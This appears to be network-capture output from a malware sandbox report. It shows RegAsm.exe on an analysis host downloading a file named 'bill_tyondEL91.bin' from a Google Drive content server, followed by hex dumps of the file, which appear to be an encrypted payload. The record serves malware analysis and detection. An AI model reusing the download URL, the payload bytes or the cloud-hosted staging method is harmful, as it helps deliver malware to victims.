                                        2021-10-13 14:33:05 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 34 2d 39 67 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 70 39 69 72
                                        Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-04-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/p9ir
                                        2021-10-13 14:33:05 UTC1INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.11.2049756142.250.184.193443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        TimestampkBytes transferredDirectionData
                                        2021-10-13 14:33:05 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/p9irpuq1lj8ip6m4433g3knsldrdvp8d/1634135550000/12448148553778765603/*/1kFeDtVEJdXDeWXxKM0sf_SDs1MXR4dov?e=download HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Cache-Control: no-cache
                                        Host: doc-04-9g-docs.googleusercontent.com
                                        Connection: Keep-Alive
                                        2021-10-13 14:33:05 UTC2INHTTP/1.1 200 OK
                                        X-GUploader-UploadID: ADPycdsKK6mrfOpTCmPBKUatc0DVb88XPRxc_Dk9KCp0vLYTHXPSD4PCE61_6a_Mc1n4YVbYPeioI_UuAh5DaRJM5_WQC4MUeQ
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                        Access-Control-Allow-Methods: GET,OPTIONS
                                        Content-Type: application/octet-stream
                                        Content-Disposition: attachment;filename="bill_tyondEL91.bin";filename*=UTF-8''bill_tyondEL91.bin
                                        Content-Length: 221760
                                        Date: Wed, 13 Oct 2021 14:33:05 GMT
                                        Expires: Wed, 13 Oct 2021 14:33:05 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=lJTMrg==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                        Connection: close
                                        2021-10-13 14:33:05 UTC5INData Raw: f6 dd f8 cd cc d4 17 8b fb fc c9 0a f2 e0 07 df 99 65 68 a3 02 f5 c3 11 93 09 8e be 31 07 55 43 ee 46 c1 71 40 10 3f 11 0c c4 05 14 1d 88 d2 cd 76 94 3e de 14 25 74 5d 59 fd 4b 4b 41 d6 be 27 ce db 7c 04 f2 66 90 c9 37 7c d2 ac e2 e6 2f 41 66 ec 4d 91 a4 11 b3 0a 4d 52 b3 30 31 a8 62 48 e9 7a 0e e1 eb b8 7a 6d 75 3b 85 b4 79 e7 91 5d 7e 0a a6 63 d6 5e 5d 50 84 f7 17 bb 95 72 0d 7d 14 d4 e5 08 46 f5 88 89 a9 5f 1d 57 27 1c ee 13 1a 61 a9 fa 15 a1 02 45 09 be d5 87 c4 fb 8c 54 37 f5 0a 43 b4 b6 41 e0 16 e0 77 97 be 4e 51 d1 bf a3 7d 8b 3c d9 7b da 9c 05 17 31 bc fa 29 07 e3 46 3e e1 ed 04 ef 25 24 00 0b d1 51 a8 06 a4 23 e4 e6 e2 bb 79 3c 45 02 7f 55 05 47 5c 2c a7 5a af 6b 7c f9 31 99 fd 7b 79 62 df e7 1c 63 e8 df 43 37 c7 50 d1 98 e3 82 9a d9 0d 64 4f 54
                                        Data Ascii: eh1UCFq@?v>%t]YKKA'|f7|/AfMMR01bHzzmu;y]~c^]Pr}F_W'aET7CAwNQ}<{1)F>%$Q#y<EUG\,Zk|1{ybcC7PdOT
                                        2021-10-13 14:33:05 UTC9INData Raw: 99 cd 47 db 36 89 13 a4 fe 10 06 9e 84 cc 19 e4 01 d1 67 d5 b2 db 27 38 90 fc 20 68 e4 03 3e eb 7d db e6 2d 27 9c 65 df 06 a8 06 ae ff cc c8 e0 5b 7f 34 9a 1b 56 69 05 47 0e 07 89 58 a7 6d 76 d1 09 99 fd 1f d1 61 d9 cd 3c 63 e8 de 6b 37 c7 52 d1 a1 e3 94 35 d9 07 64 4d 54 7f 72 93 4a b5 4f 1f e6 8d d5 9a 9d a9 89 d9 c1 53 c4 06 02 7e 25 ad 2a c0 ab 24 dd c5 29 00 87 7d 98 7b 13 34 30 84 3e e4 0d b6 23 25 01 5c 0e 66 45 69 55 f7 7e 7e 5c af 59 0b e2 07 c2 f0 2b bb 8f 3a 80 6d 59 85 11 a2 ef 58 d9 8d 09 1a b5 31 a7 7c 9a 61 50 6d 7e a5 79 8a 42 12 60 ed d1 4c 04 89 7f bd 71 f8 6d e7 58 fe 18 4f ec 32 42 b6 dc 8a 3a 38 41 bf dd 10 3f 3a b1 2f 60 2a 11 05 26 89 8b 46 01 25 71 65 19 db 1d e2 15 26 2c 06 fa f0 9b 17 4a 7c 42 a3 5e 16 8f 74 17 7a be 26 26 b0 91
                                        Data Ascii: G6g'8 h>}-'e[4ViGXmva<ck7R5dMTrJOS~%*$)}{40>#%\fEiU~~\Y+:mYX1|aPm~yB`LqmXO2B:8A?:/`*&F%qe&,J|B^tz&&
                                        2021-10-13 14:33:05 UTC13INData Raw: 9f 1b ca 89 03 0d a6 41 fb 82 9b 47 5b 7b 53 c5 1e f9 40 18 60 67 82 5d 17 8b 10 fc 75 e7 69 1f 71 9f 17 46 f5 56 6d ae dc 80 38 f5 0c b0 ce 1e 34 2c c1 0b 9e 2b 3c 66 7c 92 f5 54 29 6b 77 c7 00 c4 26 c8 15 37 22 07 44 7a b7 14 52 68 29 f7 4f 12 9a 77 ee 14 ca 2b 2f a5 2a 1b 43 c6 e0 af 40 b6 46 bd 77 29 3e 0d af 1b f5 28 af 1b 8a 44 6b 03 33 a9 55 78 08 c2 5e 5c e0 9e 58 52 7d 7e 8b 34 be dc c0 af 89 d7 64 cd 1b 1c 46 e7 0a 10 30 81 45 a4 bd 1f fc 51 76 93 97 8b 61 ec d3 cb 10 f5 97 b4 e0 63 8f 1b e6 ff 71 fa 75 90 3b 4c 08 2a d0 e9 3e 7f 78 d7 41 50 c7 7c 91 f8 e4 6f 82 c6 29 ce 7e 7b 06 22 7f f7 cf a0 a1 b4 40 85 3f 0e 03 be ae a2 05 0e b3 39 a5 91 43 31 ca f8 54 e0 73 55 92 6d bb 45 0c e3 09 1f 4a b6 80 d5 aa 98 3d 36 e5 19 92 c8 5c 18 b6 04 6c 0a b6
                                        Data Ascii: AG[{S@`g]uiqFVm84,+<f|T)kw&7"DzRh)Ow+/*C@Fw)>(Dk3Ux^\XR}~4dF0EQvacqu;L*>xAP|o)~{"@?9C1TsUmEJ=6\l
                                        2021-10-13 14:33:05 UTC16INData Raw: 2d 63 88 07 c6 f1 78 d0 55 9b 3b 41 03 cb f9 fd 3c 54 70 22 a2 69 ba 56 50 fe e6 41 76 00 29 c4 5c d3 0b 07 51 e8 54 a0 ab ad 7f a7 8b 51 03 b4 71 8a 8f 06 9b e2 ba 9b c9 01 0c f8 55 c2 36 5a b7 4f a4 32 0e e9 1c 16 f9 8e 80 df 88 3e 3f 27 eb 19 ec c8 5c 14 f1 e7 6c 0a b6 fa c6 46 bc f2 ef 1b 54 18 8e e8 97 e8 7c 54 d9 ed 24 49 50 24 70 1e 0c 06 3f e1 48 b0 8f 62 d4 10 b0 99 6a cc 68 28 06 6e d4 05 91 48 b7 4c a2 7e ee 8f 47 a8 a7 7e bd 00 97 66 08 e3 65 c1 a7 bf 19 43 95 75 f6 ea 57 3a 17 22 bd 57 a7 50 93 ac 95 b8 a5 d0 c6 3a f6 e2 63 4d 33 f1 08 a4 f2 a7 a6 65 c4 8d 09 ab fe 76 4e e6 5b 7f 28 fe e7 fd 49 ae 27 c4 55 72 60 93 8d fe 54 52 2d ce 62 47 7c e9 7a 9d af f8 d2 34 67 3f 87 fe b7 54 0f 1c 79 5f 0b be cf cc 52 b4 ae 4c 4c 21 e9 1d 08 2a 47 95 93
                                        Data Ascii: -cxU;A<Tp"iVPAv)\QTQqU6ZO2>?'\lFT|T$IP$p?Hbjh(nHL~G~feCuW:"WP:cM3evN[(I'Ur`TR-bG|z4g?Ty_RLL!*G
                                        2021-10-13 14:33:05 UTC18INData Raw: 41 87 6c a2 e7 1c 1d c2 15 ba 7b 75 03 8e e5 b5 ce 65 3d 40 f7 f5 e4 af 81 f4 13 71 d5 68 20 b2 19 0e 8f 36 89 3c 9f cd 01 02 fb c1 f1 0d fd 15 fc 4e d0 b8 0f ca 14 bd fa 29 79 bd 03 3e e5 b9 45 70 25 0b 9a 76 3d 44 a8 06 a5 30 a4 f7 a2 4d 51 f1 46 09 78 fc 14 07 13 51 b0 5a a7 6f 54 bc 33 99 fb 3d 58 63 df e1 53 1b e8 df 49 95 d6 10 c9 f0 bb 80 ba df af 75 0d 4d 57 09 93 13 bf 1e c6 f4 c5 ab 8c 9d a9 8d f1 bb 53 69 a1 a0 7d 7f b7 02 a7 b2 14 de 67 2f 41 af 06 8d 7b 19 0d 55 ae 77 e2 25 94 57 16 07 4d 08 03 91 41 1f fd 56 a4 31 e4 5f 23 c6 03 d5 99 08 c3 8f 30 8c 65 11 c9 11 a4 a8 69 d9 8d 09 34 8c 5e e9 7a 47 e6 56 72 4c e2 01 8a 42 12 72 d6 9a 66 3c 8f 10 e7 af 86 19 ef 70 b3 1e 56 d9 2b 3b 21 dc 80 36 7f 3b bf dd 1c 25 3a aa c7 60 2a 1a 42 51 89 8b 46
                                        Data Ascii: Al{ue=@qh 6<N)y>Ep%v=D0MQFxQZoT3=XcSIuMWSi}g/A{Uw%WMAV1_#0ei4^zGVrLBrf<pV+;!6;%:`*BQF
                                        2021-10-13 14:33:05 UTC19INData Raw: ba 88 cf 6e ca 93 5c c8 e8 5a 92 67 93 28 0e e3 0e 37 d1 b6 80 a5 8b e0 3f 38 e3 31 09 40 55 12 9e 2e 6c 0a bc 3e c9 63 95 c5 ef 1b 5e 9c a5 c0 af e6 7c 5e 07 48 3c 41 78 c9 70 1e 0a 73 f9 e1 49 ba 51 6d f1 8c 8e 99 6a c8 7b 0b 2e 94 dd 05 9b 99 b7 5d aa 4c 15 8f 46 ae c8 b8 bd d1 94 b8 07 c8 4d f6 a7 60 1a 50 b1 51 ce ea 57 2a c9 22 ad 5f 8f ee 93 47 9a d7 63 de c6 30 28 14 4f 65 04 fe 08 ae e1 98 8e 5d c5 8d 03 75 fe 6f 4c ce a9 71 28 f8 88 2d 43 ae 2d 15 5a 57 48 be 8d fe 5f 41 0b e6 5a 62 76 e3 a4 93 be f0 fa e4 6d 3f 81 9e 71 54 0f 0c a7 50 2f 96 f8 cc 52 fc b7 6b 64 17 e9 1d 02 a4 4d 84 9b 15 d9 ad 78 50 53 2e 66 e6 2b 7f 2e d7 85 59 fa 50 5b c2 3b 09 1e 03 17 09 48 ca 2e b3 c4 80 fb d7 4a 66 37 79 94 a2 86 97 e0 86 34 67 fa d2 e7 11 a7 fc 38 a7 22
                                        Data Ascii: n\Zg(7?81@U.l>c^|^H<AxpsIQmj{.]LFM`PQW*"_Gc0(Oe]uoLq(-C-ZWH_AZbvm?qTP/RkdMxPS.f+.YP[;H.Jf7y4g8"
                                        2021-10-13 14:33:05 UTC20INData Raw: dd 64 bb cc 0b 03 2d 53 e2 1f 05 41 de ff 7d 93 a4 8d b3 0a 0d 75 b3 30 20 be 71 4c d1 f9 0e e1 eb b8 6b 69 69 c5 84 98 6d e0 fe 30 7e 0a ac 61 b9 ae 5d 50 8e ce 78 bb 15 72 10 6e 1e cb 4e 02 5d bf 80 68 8f ee 14 81 e1 21 a9 7f 73 03 8d 90 99 cf 49 32 43 84 ee f7 a1 95 f3 3f 5e 2b 69 0a 91 d3 1e 90 25 8d 19 a6 fe 19 fc f0 fe c5 31 dd 12 d4 7c dd a1 16 13 31 ad fe 30 f9 b2 2f 3b f7 ad 1f ff 21 0b 8b 69 a7 af a9 2a a7 3b f7 e2 e2 4a 7d 28 ba 08 52 5d 12 54 00 2f b6 5e b9 95 7d d5 33 b2 f8 2d 77 9e 20 18 34 74 3e d3 4b 3e 49 e7 e3 4a f5 a8 a1 e9 09 64 ca 56 7f 70 bb 13 b5 1c ac 3f 85 d5 9c 97 da 57 d8 c1 55 7a ac 7c 76 3f ad 2e ed e1 05 df bb 25 01 87 79 e2 9b 12 25 34 ba 89 e5 73 a7 57 16 05 4a f1 6d 23 6d 2f e6 79 1b d2 e5 59 0d f9 06 ba 7c 66 bb 89 21 81
                                        Data Ascii: d-SA}u0 qLkiim0~a]PxrnN]h!sI2C?^+i%1|10/;!i*;J}(R]T/^}3-w 4t>K>IJdVp?WUz|v?.%y%4sWJm#m/yY|f!
                                        2021-10-13 14:33:05 UTC22INData Raw: 83 c2 89 61 eb c0 97 0e c8 99 ac e3 78 76 0c 34 ed 5b d0 85 99 3b 4d 38 3c d3 c5 3a 3b 02 fc a2 72 b8 62 9d fe ee 58 08 38 28 e8 58 0a 2c 59 79 df 5e 20 a9 be 5f 8b ac 43 0f be a7 95 93 f0 b2 1f b1 9c d7 46 20 fa 55 ce 4a 4a 9c 6b 93 3a 18 1d 0e 1b d3 a1 8c df 8a ff 2d c8 e2 1d 0b e3 59 2a ed df 93 f5 96 24 c9 63 8f f5 eb 1b 95 0b ac c0 85 e8 7c 4f 05 c5 ca 41 78 cc 1f 2a 0a 69 f3 8e 7d ba 51 67 fb e5 34 99 6a c6 5e 23 19 56 d4 0f 97 94 9f a2 aa 56 1f 9c 43 8e c8 bc bd 00 10 c3 07 c6 4c fb 77 c3 13 50 b0 75 da ea 57 3a e1 22 ad 5f 85 e7 1d 1b 4b 6f 70 d5 d0 3b 39 e9 29 64 05 f1 02 a7 f0 87 9c 5c ec cc 03 75 f8 41 41 b8 c5 af 54 f8 88 3a 61 ba 2d 1a 50 7f 48 a5 8d f4 32 1a 23 77 5a 47 76 54 b7 9b a8 e1 fc c4 6e 2c 86 ba 4a 74 0f 12 a7 50 5d 94 f9 cc 58 ad
                                        Data Ascii: axv4[;M8<:;rbX8(X,Yy^ _CF UJJk:-Y*$c|OAx*i}Qg4j^#VVCLwPuW:"_Kop;9)d\uAAT:a-PH2#wZGvTn,JtP]X
                                        2021-10-13 14:33:05 UTC23INData Raw: c3 f8 e2 05 89 79 6d 15 ca cb 32 e4 50 46 04 0b aa 95 44 64 f6 6e 98 67 ec 3e 7a 21 92 e5 d8 1c 68 32 31 f8 93 0d 07 b2 79 77 36 3c 2d 3a 3e 17 b7 ce 82 ec fd ee 6d dd 34 b4 d4 88 a1 87 89 76 12 d9 48 90 c9 39 6a 2c ad 31 04 33 52 da ec 5c 95 b2 ef b2 26 0e 45 a0 34 31 b9 66 55 17 7b 22 e3 c0 bd 42 04 8a c4 7a bc 6e 31 9d 55 77 3b 65 75 fc 5e 5d 50 9f c7 13 bb 96 75 0d 7d 35 cb 5f 17 6e 09 81 44 8e 67 3c 1b ea 39 c4 5f 73 12 8d a6 59 b0 46 37 68 d7 e2 d7 bd eb c7 3b 43 d1 e6 91 82 f5 18 a6 7c 89 19 b1 d7 04 df a2 d5 cc 19 c5 0c aa 55 d0 b8 01 0f 02 aa 84 0c 07 b3 07 b0 56 b7 34 e0 0d 40 9a 6d b6 7c ad db 97 24 e4 e6 ca 12 79 3e 42 0b 60 1e ee 47 04 2f d9 57 a7 6b 78 d1 de 9b fd 13 27 21 df e7 36 50 f1 a1 4b 37 c7 54 f9 28 e1 82 bc f1 29 64 4d 5e ff 78 93
                                        Data Ascii: ym2PFDdng>z!h21yw6<-:>m4vH9j,13R\&E41fU{"Bzn1Uw;eu^]Pu}5_nDg<9_sYF7h;C|UV4@m|$y>B`G/Wkx'!6PK7T()dM^x
                                        2021-10-13 14:33:05 UTC24INData Raw: 24 a5 5e 00 28 ba e8 a9 e2 ad 7e a2 70 29 29 21 9d e5 f4 0e 2c 04 99 40 6f cf fa b4 4d 86 0b f1 25 44 fc d8 b8 af 82 85 a4 47 a4 dc c6 83 85 f3 64 c7 91 3e 55 d7 0c cd 97 82 45 a4 b7 00 86 73 79 e6 b4 90 61 ef ec 3b 12 d9 93 84 cf 63 88 07 98 f6 5d f8 66 46 aa 49 10 d4 d3 da 47 67 63 82 aa 78 b2 7a b9 f1 e5 47 1f ee 0d c4 56 07 84 2a 79 df 50 7d d2 bc 5f 8f b1 4e 23 8d b6 f4 96 0e b3 37 92 c1 cd 6e cc d0 71 c8 e8 5f 12 6f 93 32 0a 3e 5a 35 d1 b6 a8 db 82 e0 39 59 ea 30 09 c2 33 19 9f 21 66 22 b8 24 c9 65 fb cc ee 1b 54 64 a6 c1 af e2 6a a0 06 b2 37 5e 6a 38 71 08 f4 68 a6 e3 68 1e 51 6d f1 c6 86 8f 94 c7 24 09 0e f3 d4 05 9b 68 b6 4b 54 57 4a a3 2d ac 44 c7 bd 00 9c d7 0b c7 4d fc c8 b8 12 50 bb 75 de e9 57 36 a6 bf ac 5f 85 c2 86 ae 1f a8 63 d0 c7 5f 24
                                        Data Ascii: $^(~p))!,@oM%DGd>UEsya;c]fFIGgcxzGV*yP}_N#7nq_o2>Z59Y03!f"$eTdj7^j8qhhQm$hKTWJ-DMPuW6_c_$
                                        2021-10-13 14:33:05 UTC25INData Raw: 98 14 66 a3 55 43 99 75 56 80 0e 13 7c 0a 89 a4 a5 9d 5e 0a 76 23 c8 02 d1 19 6f 3e 5b be 36 ad 74 7f 58 3a 75 f7 a6 5f 25 a8 98 1e 06 d9 f4 13 1f 33 bb 71 9b 13 32 eb a7 7b be 75 9c 43 df 4a 14 26 e0 30 07 bd 67 6b 04 d0 e7 3a 1b 51 60 18 1a ce a3 5f 64 e3 fb 30 5a c8 32 5a 35 83 f0 d3 25 78 2f cf f3 ac 10 0f b3 77 7f 32 2d 27 21 31 17 b7 ce 94 e8 83 e2 44 cc 3f ca fb 84 be 96 92 f7 04 e0 7d 8f fa cd 7d fe bc 0c 1c 07 12 de ec 4b a8 52 13 b3 0a 12 66 a0 2b 31 b9 79 57 d0 84 0f cd e1 cb 58 6f 75 3d 8f ab 43 f4 8a 5d 6f 11 b9 6c 28 5f 71 5a 95 fc 09 6d 06 79 12 6d 09 d0 5f 17 5d 5e b5 ba 89 cb 0e 33 f8 3c ba 71 62 17 e6 9f 66 ce 6f 24 71 cc c0 f7 be 95 f3 20 5c ee 96 27 b8 cf 32 89 59 af 1b b7 fc 1e 3e e2 c9 cc 08 f5 08 2a 77 fc b1 14 1c 2b 6a e9 22 1c a0
                                        Data Ascii: fUCuV|^v#o>[6tX:u_%3q2{uCJ&0gk:Q`_d0Z2Z5%x/w2-'!1D?}}KRf+1yWXou=C]ol(_qZmym_]^3<qbfo$q \'2Y>*w+j"
                                        2021-10-13 14:33:05 UTC27INData Raw: 5a 05 8f 1a fe 7f e9 68 fb 61 bd cc 99 f9 52 11 a7 d3 a8 28 56 13 b5 d1 0b 3b 27 13 06 6f 28 01 65 5d 9d 8a 4c 23 66 62 6a 05 1b 26 c3 17 37 29 38 ae 7a 9b 1d 59 76 3c f8 44 07 88 ae c6 06 e9 24 37 b5 0e 27 30 c4 ea ba e7 b8 59 b4 a5 3a 20 18 bc f2 2e 13 7a 81 b2 40 6b 13 24 b2 4f 97 06 ff 58 61 f4 a3 98 b8 83 81 86 49 b6 d0 af b7 a0 f3 6e f4 3d 37 55 d7 00 30 36 00 45 a4 f5 80 fc 40 60 9b ad 9c 0e f6 c5 35 1b b6 8b ad eb 69 a0 5f 18 fe 5b eb 76 8a 2f 5a 00 dc f9 95 3c 54 7c ef b0 7f de 5d 91 fe e6 47 19 c6 09 84 0d 2e 04 22 79 df 54 a0 51 81 06 a7 22 51 03 b4 18 9d 48 83 98 33 ba 9a dc 7d db ea 44 db ef 39 b1 67 93 32 0e e3 0f 17 91 ed a8 c0 83 e0 35 1e c3 30 09 c2 58 3a 89 22 6c 0c d3 3d c8 63 9e e9 fd 0a 5a 1a bf c6 b7 c0 2d 5e 07 eb 26 46 a5 6c 70 1e
                                        Data Ascii: ZhaR(V;'o(e]L#fbj&7)8zYv<D$7'0Y: .z@k$OXaIn=7U06E@`5i_[v/Z<T|]G."yTQ"QH3}D9g250X:"l=cZ-^&Flp
                                        2021-10-13 14:33:05 UTC28INData Raw: 5b c3 2f 70 00 2b b4 06 48 c0 36 25 fb 80 fa d6 62 55 36 05 94 b5 0a a6 e0 86 35 c5 5b d2 e7 14 8f a6 38 bd 28 e2 08 7a e7 dc 21 4e fe 81 fb e5 73 0f 70 79 92 b9 f3 0a de e3 0d 22 2e 73 e2 00 f2 89 02 df a5 a0 55 a3 fa 71 93 15 12 cf 00 9d a5 57 8d 7e 10 60 2a 4e 05 c0 18 6e 27 45 a3 24 a8 70 f8 49 26 79 fe 1e b0 29 93 a4 91 14 d8 fe 3f 0c 2f a6 f0 b3 63 30 e6 b1 eb 9b 7b b9 50 ce 9a 17 3d f9 d5 2e 85 6a 69 1f f3 fb 2a 1a 5b 1e 19 1d d4 ab 57 63 e3 e7 3e 77 b8 84 6e e1 97 7d ab 28 6d 2e c5 ea b7 19 18 8c 4c 7e 31 3c 3a 29 a8 ee b6 e2 98 f9 9e f8 60 cb 2f cf d9 99 a1 83 8b 4e 15 fd 75 9b d8 38 68 c6 bb 90 36 2f 41 df ff 40 80 a9 07 a4 96 1c 5f 9b 93 31 a8 68 59 e4 6c 9e cd e0 a9 71 7b ef 13 94 b4 79 ed 82 58 0a 18 a6 63 cd 53 83 5c 95 ff 3b bc 04 7a 62 2a
                                        Data Ascii: [/p+H6%bU65[8(z!Nspy".sUqW~`*Nn'E$pI&y)?/c0{P=.ji*[Wc>wn}(m.L~1<:)`/Nu8h6/A@_1hYlq{yXcS\;zb*
                                        2021-10-13 14:33:05 UTC29INData Raw: 8d 6c 88 6d 02 01 24 b3 6f cc 1a bd 57 1c 10 7e 1e 48 2c 66 1e f7 74 65 11 f5 7a 64 c0 00 d5 95 76 99 98 5f af 4c 79 c1 00 80 99 7a f3 8c 03 16 b3 7c 86 57 9b 6b 5c 63 48 dc 27 8e cc af 09 e9 9c 4e 0e 9c 35 f2 31 75 4c e1 70 b2 09 6e fb 78 0c 9e cd a1 2a 48 53 97 ca 1b 34 37 b6 30 61 2a 1a 79 53 98 ad 5d 08 04 51 64 1f c7 26 eb 04 01 0e 08 bb 7b 91 3f 1d 79 2d f1 76 38 87 78 16 7a 9e 26 26 b0 35 1b 36 d5 e6 b8 ca c6 6c af 73 23 f1 05 a8 c3 d8 03 bd 2a f6 17 6b 12 3d 6a 4a 8c d7 f7 5b 7d 3b b3 b7 a5 5c 90 a9 62 90 dc c0 a1 b2 da 4c f5 11 36 5f 09 08 17 12 86 6f e5 c9 1f fc 42 60 98 bc 24 61 eb c4 14 11 d9 95 79 eb 63 88 1c 18 fe 5d f8 62 9b 3b 49 10 d4 d1 32 3c 54 7a dd a2 78 b2 66 90 fe e6 56 19 c6 29 c4 56 0d 04 20 79 df 54 a7 a3 be 5f 7a b3 51 03 42 ad
                                        Data Ascii: lm$oW~H,ftezdv_Lyz|Wk\cH'N51uLpnx*HS470a*yS]Qd&{?y-v8xz&&56ls#*k=jJ[};\bL6_oB`$ayc]b;I2<TzxfV)V yT_zQB
                                        2021-10-13 14:33:05 UTC31INData Raw: 09 55 57 59 ab 92 ed a0 40 32 7d 5a 47 7c f7 74 1c be f0 fb ff 73 3f 81 9b 59 48 0c 16 a1 4b a3 91 f8 cc 53 ad b6 7a 6f 0f ee 35 13 f4 47 8e 39 0b d2 ba 67 76 df 11 67 e6 2a dd 3f 83 97 48 fe 76 4a c2 3b 6e b6 12 1c 1f 5e 46 11 a9 c4 81 58 c6 41 7c 26 01 8d af 97 94 f4 ae b5 ef f0 d4 f1 93 a0 fc 38 bc 36 e1 ca df 6f dc 21 45 c5 97 ea e3 6d 85 78 71 81 b5 fa 8d cd f7 16 ae 12 78 f3 0a f7 94 14 71 a2 bc de a4 7a 59 85 89 02 61 09 81 2a 4a 90 6b 12 e8 23 cf 30 d7 84 7e 38 5f 9a 8e be 67 6e 7e 34 7a fb 8d a1 35 8b 93 27 ea d9 d8 0a 0c 2b a6 48 8b 7d 21 e0 2b 4e b3 6a b8 43 c1 55 17 2e f6 ce 17 9e 75 62 eb da e3 26 05 41 e7 20 1d d4 b1 57 6d ed ec 3c 7f 36 22 79 24 91 1f d9 21 4f 3f c5 e1 25 20 01 98 64 6e e2 2e 3c 3e 3e c1 a2 e2 99 e0 ba dd 6d dd 34 be e3 88
                                        Data Ascii: UWY@2}ZG|ts?YHKSzo5G9gvg*?HvJ;n^FXA|&86o!EmxqxqzYa*Jk#0~8_gn~4z5'+H}!+NjCU.ub&A Wm<6"y$!O?% dn.<>>m4
